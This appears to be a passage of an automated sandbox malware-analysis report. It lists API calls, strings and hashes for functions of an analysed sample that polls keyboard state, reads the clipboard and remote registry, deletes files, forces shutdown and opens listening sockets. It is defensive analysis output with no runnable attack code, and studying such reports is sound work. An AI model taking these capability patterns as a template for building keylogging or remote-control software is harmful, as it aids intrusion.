GetAsyncKeyState.USER32(000000A1), ref: 004A0168
GetKeyState.USER32(000000A1), ref: 004A0179
GetAsyncKeyState.USER32(00000011), ref: 004A01A5
GetKeyState.USER32(00000011), ref: 004A01B3
GetAsyncKeyState.USER32(00000012), ref: 004A01DC
GetKeyState.USER32(00000012), ref: 004A01EA
GetAsyncKeyState.USER32(0000005B), ref: 004A0213
GetKeyState.USER32(0000005B), ref: 004A0221

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 21c6200ed6d77dccd30b66e2d5566fe4be57e4b045e76307e672d1e21aed9b4d
Instruction ID: 1501d48e7f9f393b9f182041f74afb5dcec5ccfab8f18a8d87e78381589b8ec8
Opcode Fuzzy Hash: 21c6200ed6d77dccd30b66e2d5566fe4be57e4b045e76307e672d1e21aed9b4d
Instruction Fuzzy Hash: 0D51BB3090478829FB35DBA098547EBBFB49F23380F08459F95C1576C3DAAD9A8CC769

Function 004C03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004C0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004BFDAD,?,?), ref: 004C0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004C04AC

Part of subcall function 00449837: __itow.LIBCMT ref: 00449862
Part of subcall function 00449837: __swprintf.LIBCMT ref: 004498AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004C054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004C05E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 004C0822
RegCloseKey.ADVAPI32(00000000), ref: 004C082F

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: f99edf5596f73c3ba8daa13f01d802188543e377da653268d19cce29fa631528
Instruction ID: f6506dde7dec5fe0883159ff08f8303479251e08bb8e44488482e2696f9377b7
Opcode Fuzzy Hash: f99edf5596f73c3ba8daa13f01d802188543e377da653268d19cce29fa631528
Instruction Fuzzy Hash: 21E15F75204200EFCB54DF29C891E2BBBE5EF89714F04856EF84AD7262DA34ED05CB56

Function 004B4164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004B418B
EmptyClipboard.USER32 ref: 004B4191
GlobalAlloc.KERNEL32(00000002,?), ref: 004B41A6
CloseClipboard.USER32 ref: 004B4245

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 95729d4825046bc7cd3b5066a3f9d9da1eb115d4d0ed201d083e06434ab60f46
Instruction ID: 318332090d29f3f7f5a4590b154e0dc9623f692a8ca419746143c76dee83610a
Opcode Fuzzy Hash: 95729d4825046bc7cd3b5066a3f9d9da1eb115d4d0ed201d083e06434ab60f46
Instruction Fuzzy Hash: BB21D3357002109FDB10AF28EC09F6E7BA9EF44355F00806AF945DB2A2DB38AC05DB5D

Function 004A37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00444750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00444743,?,?,004437AE,?), ref: 00444770

Part of subcall function 004A4A31: GetFileAttributesW.KERNEL32(?,004A370B), ref: 004A4A32

FindFirstFileW.KERNEL32(?,?), ref: 004A38A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 004A394B
MoveFileW.KERNEL32(?,?), ref: 004A395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 004A397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 004A399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 004A39B9

Strings

\*.*, xrefs: 004A384E, 004A3857, 004A386C

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 4a9c3cd0fa43c98193787fe01f0bd891069629a43498b5bc3578933399f8ed8d
Instruction ID: 5d27b3e5ca37d8d7bccf77b7f0d07eebb2dbdbb9a347facbfcb8655df8eea8b2
Opcode Fuzzy Hash: 4a9c3cd0fa43c98193787fe01f0bd891069629a43498b5bc3578933399f8ed8d
Instruction Fuzzy Hash: 9A51A07180414CAADF01EFA1C992DEEB779AF21305F60006FF40676192EB396F0ACB59

Function 004AF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00447DE1: _memmove.LIBCMT ref: 00447E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 004AF440
Sleep.KERNEL32(0000000A), ref: 004AF470
_wcscmp.LIBCMT ref: 004AF484
_wcscmp.LIBCMT ref: 004AF49F
FindNextFileW.KERNEL32(?,?), ref: 004AF53D
FindClose.KERNEL32(00000000), ref: 004AF553

Strings

*.*, xrefs: 004AF425

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: bd2ecd5ebf88bb5556ad4d3e8c042e4b62bbf93dfba8cd5577aac8c47aa69fcd
Instruction ID: 07c8f205041ca4b791c35bac84800fe28e0e28d234dbc8f4720f4da2dcce9bd0
Opcode Fuzzy Hash: bd2ecd5ebf88bb5556ad4d3e8c042e4b62bbf93dfba8cd5577aac8c47aa69fcd
Instruction Fuzzy Hash: BD418D71D00219ABDF10DFA4CC45AEEBBB4FF19314F10416BE815A3292EB389E49CB58

Function 00453030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON

Download Yara Rule

Strings

_E, xrefs: 00453322
3cE, xrefs: 00453225

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: __itow__swprintf
String ID: 3cE$_E
API String ID: 674341424-1012516122
Opcode ID: d4b808d8caa20ad72c1e171a97969cfa9904e4507ccc8fffb1029b7dcdac8395
Instruction ID: 7612a30426d463444567d0c3d8c36c085706f5bd7419ef747adb8f4339bec1c2
Opcode Fuzzy Hash: d4b808d8caa20ad72c1e171a97969cfa9904e4507ccc8fffb1029b7dcdac8395
Instruction Fuzzy Hash: 59229E716083009FD724EF14C881B6FB7E4AF85355F00491EF99A97382DB79E909CB9A

Function 00455760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004558A5
_memmove.LIBCMT ref: 004558F5
_memmove.LIBCMT ref: 0045595B

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: df8c42a7e8c33bae37c2b677ecf26414c18187b7a661c3f12ca9928397ee5860
Instruction ID: 0f40b4404a3b7501f87713b4fb46fabcd4c71ec3dfbd2251663f7d8108498de8
Opcode Fuzzy Hash: df8c42a7e8c33bae37c2b677ecf26414c18187b7a661c3f12ca9928397ee5860
Instruction Fuzzy Hash: 4E12CE70A00609DFDF04DFA5D981AAEB7F5FF48304F10452AE806E7251EB3AAD25CB59

Function 004A3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00444750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00444743,?,?,004437AE,?), ref: 00444770

Part of subcall function 004A4A31: GetFileAttributesW.KERNEL32(?,004A370B), ref: 004A4A32

FindFirstFileW.KERNEL32(?,?), ref: 004A3B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 004A3BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 004A3BEA
FindClose.KERNEL32(00000000), ref: 004A3C01
FindClose.KERNEL32(00000000), ref: 004A3C0A

Strings

\*.*, xrefs: 004A3B5B

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 4744b3ab3476ea4aac95ee0e8fec237ed20288a77d84465b1762073688c1e6ef
Instruction ID: 85e1c2bbc5dfde52196917b16f07d3562246ae80c231572e046b3c867b6c3d22
Opcode Fuzzy Hash: 4744b3ab3476ea4aac95ee0e8fec237ed20288a77d84465b1762073688c1e6ef
Instruction Fuzzy Hash: 873186310083859FD701EF64C891DAFB7A9AE92319F404D2EF4D592192EB29DA0DC76B

Function 004A51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 004987E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0049882B
Part of subcall function 004987E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00498858
Part of subcall function 004987E1: GetLastError.KERNEL32 ref: 00498865

ExitWindowsEx.USER32(?,00000000), ref: 004A51F9

Strings

@, xrefs: 004A51EC
, xrefs: 004A51E7
SeShutdownPrivilege, xrefs: 004A51C9

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 5a0921903d8212c71d20fdbe0e705b30c7baa5f7d45d3d6e9d1fd8781f2d7c22
Instruction ID: 253df2b6d50d03677ca0560e8352ae48a3f2584d8f98e773584b6688a01151ec
Opcode Fuzzy Hash: 5a0921903d8212c71d20fdbe0e705b30c7baa5f7d45d3d6e9d1fd8781f2d7c22
Instruction Fuzzy Hash: 5B0170337916012BF7282268AD4BFBB7258D727350F2008B7F913D61D2D95D1C014D9D

Function 004B6283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004B62DC
WSAGetLastError.WSOCK32(00000000), ref: 004B62EB
bind.WSOCK32(00000000,?,00000010), ref: 004B6307
listen.WSOCK32(00000000,00000005), ref: 004B6316
WSAGetLastError.WSOCK32(00000000), ref: 004B6330
closesocket.WSOCK32(00000000,00000000), ref: 004B6344

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 86ff4cc97e5e9f2a26d5d1fdf16f8f75d4b03122f43523318c0f6d684b38571c
Instruction ID: 90465e5d6354d7415fdc82e83d5628731a2ae702408dafb15d9f416b9b0c2239
Opcode Fuzzy Hash: 86ff4cc97e5e9f2a26d5d1fdf16f8f75d4b03122f43523318c0f6d684b38571c
Instruction Fuzzy Hash: B221A031600204AFDB10EF68C845FAEB7E9EF48724F15416AEC16A7391CB78AD05DB69

Function 00455520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00460DB6: std::exception::exception.LIBCMT ref: 00460DEC
Part of subcall function 00460DB6: __CxxThrowException@8.LIBCMT ref: 00460E01

_memmove.LIBCMT ref: 00490258
_memmove.LIBCMT ref: 0049036D
_memmove.LIBCMT ref: 00490414

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: d11d872c947cf0e98ba5d77ab1e1aeeec70dcde4503979fb013424dcfe8347a1
Instruction ID: bfbdd78501e61487a71327f0635fc3394b94c708bdd58142b2f1dc871a337de3
Opcode Fuzzy Hash: d11d872c947cf0e98ba5d77ab1e1aeeec70dcde4503979fb013424dcfe8347a1
Instruction Fuzzy Hash: AC02EEB0A00209DFDF04DF65D981ABEBBB5EF44304F10806EE80ADB251EB39D955CB99

Function 00441287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00442612: GetWindowLongW.USER32(?,000000EB), ref: 00442623

DefDlgProcW.USER32(?,?,?,?,?), ref: 004419FA
GetSysColor.USER32(0000000F), ref: 00441A4E
SetBkColor.GDI32(?,00000000), ref: 00441A61

Part of subcall function 00441290: DefDlgProcW.USER32(?,00000020,?), ref: 004412D8

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 78f990b2be2712cf728358b0ccab6b48655c5a0f8b54b4ab448b8fbaeb256ed7
Instruction ID: bc79b4f4a3360322c9b1118879c31d0a89d60f989f7659a0c7a9a043ca87f71f
Opcode Fuzzy Hash: 78f990b2be2712cf728358b0ccab6b48655c5a0f8b54b4ab448b8fbaeb256ed7
Instruction Fuzzy Hash: 60A139F1102544BAF628AE294C48FBF295DDF41389B14411FF506E62B2DA2C9D82D6BF

Function 004B6747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 004B7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 004B7DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 004B679E
WSAGetLastError.WSOCK32(00000000), ref: 004B67C7
bind.WSOCK32(00000000,?,00000010), ref: 004B6800
WSAGetLastError.WSOCK32(00000000), ref: 004B680D
closesocket.WSOCK32(00000000,00000000), ref: 004B6821

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 520150f87806bd6a3ffd7f2086c4db203e72e76b478a5311d55d43692f2312ec
Instruction ID: 3dd396967400fabab4dd5e4f5d72ecf1ae851aa0a1b749ced8f4a297cc43da77
Opcode Fuzzy Hash: 520150f87806bd6a3ffd7f2086c4db203e72e76b478a5311d55d43692f2312ec
Instruction Fuzzy Hash: 6C41E575A002006FEB50BF298C86F6E77A8DF45718F05846EF915AB3D3CA789D0097A9

Function 004C5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 004C53C5
IsWindowEnabled.USER32 ref: 004C53D3
GetForegroundWindow.USER32(?,?,00000001), ref: 004C53E0
IsIconic.USER32 ref: 004C53EE
IsZoomed.USER32 ref: 004C53FC

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 8086b9ebe28178af2f04d78a02a72f26a0cb60d59792a3a239203a6e6c6d5c2e
Instruction ID: b5286615d21cc58b5b072c0305e75f0c49046c3352e99438b7a7e35834199ec1
Opcode Fuzzy Hash: 8086b9ebe28178af2f04d78a02a72f26a0cb60d59792a3a239203a6e6c6d5c2e
Instruction Fuzzy Hash: 7711B2353009516BEB616F269C44F6F7B99EF847A1B41403EF846D3251CBBCEC4286AC

Function 004980A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004980C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004980CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004980D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004980E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004980F6

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 9411253bdfb4e75a429cfd211309f6e8debcd6f70de52026afbd9a772cbdedb0
Instruction ID: d4ed0ade529ef7c6c8e65a4b73b23790f9b0f83c9b848e7aa11e2ff9b9e67a25
Opcode Fuzzy Hash: 9411253bdfb4e75a429cfd211309f6e8debcd6f70de52026afbd9a772cbdedb0
Instruction Fuzzy Hash: 0BF04F31240214AFEB100FA9EC8DE673FADFF4A755B04003AF945D6260CA699C45DA64

Function 004AC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 004AC432
CoCreateInstance.OLE32(004D2D6C,00000000,00000001,004D2BDC,?), ref: 004AC44A

Part of subcall function 00447DE1: _memmove.LIBCMT ref: 00447E22

CoUninitialize.OLE32 ref: 004AC6B7

Strings

.lnk, xrefs: 004AC3C6, 004AC3EE, 004AC3F8

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 5c7e1cb9cb502a8421038f546eed70d06912f44a1776a1ae00c7592562f1c208
Instruction ID: 7e3bf673d26a7abadd147f46314598bc9d1c941ecb7999b131ebbeb4df7cb26e
Opcode Fuzzy Hash: 5c7e1cb9cb502a8421038f546eed70d06912f44a1776a1ae00c7592562f1c208
Instruction Fuzzy Hash: 3CA13AB1104205AFE700EF55C881EAFB7A8FF99318F00492EF1558B192DB75EE09CB66

Function 00444B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00444AD0), ref: 00444B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00444B57

Strings

kernel32.dll, xrefs: 00444B40
GetNativeSystemInfo, xrefs: 00444B51

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 17a94a45387de66162ba58143e6b5bf085980200f8a66087ec221757108926e1
